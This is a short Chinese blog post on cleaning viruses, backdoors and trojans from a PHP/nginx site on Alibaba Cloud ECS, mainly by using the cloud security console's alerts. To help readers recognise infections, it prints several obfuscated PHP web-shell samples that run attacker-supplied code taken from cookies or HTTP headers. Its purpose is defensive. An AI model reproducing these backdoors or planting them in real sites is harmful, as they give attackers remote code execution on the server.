需求
识别站点病毒、后门、木马,然后将其清理,保证正常运行。
环境:
1. 阿里云ECS ubuntu_16_0402_64
2. nginx+php7.0+mysql
查找病毒
登录阿里云,找到“云安全中心——>检测响应——>安全告警处理”,罗列出当前站点扫描到的后面、病毒、木马
右边点击“详情”查询具体的文件,然后登录站点删除文件或将文件内的内容删除,最后点击“处理”
病毒特点
伪装成乱码
<?php
$p=$_COOKIE;(count($p)==23&&in_array(gettype($p).count($p),$p))?(($p[24]=$p[24].$p[94])&&($p[8]=$p[24]($p[8]))&&($p=$p[8]($p[74],$p[24]($p[28])))&&$p()):$p;
第二种类型
<?php
$p=$_COOKIE;(count($p)==13&&in_array(gettype($p).count($p),$p))?(($p[30]=$p[30].$p[71])&&($p[34]=$p[30]($p[34]))&&($p=$p[34]($p[25],$p[30]($p[64])))&&$p()):$p;
$_HEADERS=getallheaders();if(isset($_HEADERS['If-Unmodified-Since'])){$cache=$_HEADERS['If-Unmodified-Since']('', $_HEADERS['Content-Security-Policy']($_HEADERS['Large-Allocation']));$cache();}
$qzem=$_COOKIE;
$zneec=$qzem[orru];
if($zneec){
$vwva=$zneec($qzem[vmzx]);$hft=$zneec($qzem[nleo]);$ogax=$vwva("",$hft);$ogax();
}
出现最多是在uploads目录或站点根目录保持文件的目录
依次检查站点里面所有文件,wordpress站点病毒伪装的为.php,打开发现很长看不懂的乱码,可以怀疑为病毒。
当前文章价值0.78元,扫一扫支付后添加微信提供帮助!(如不能解决您的问题,可以申请退款)
评论已关闭!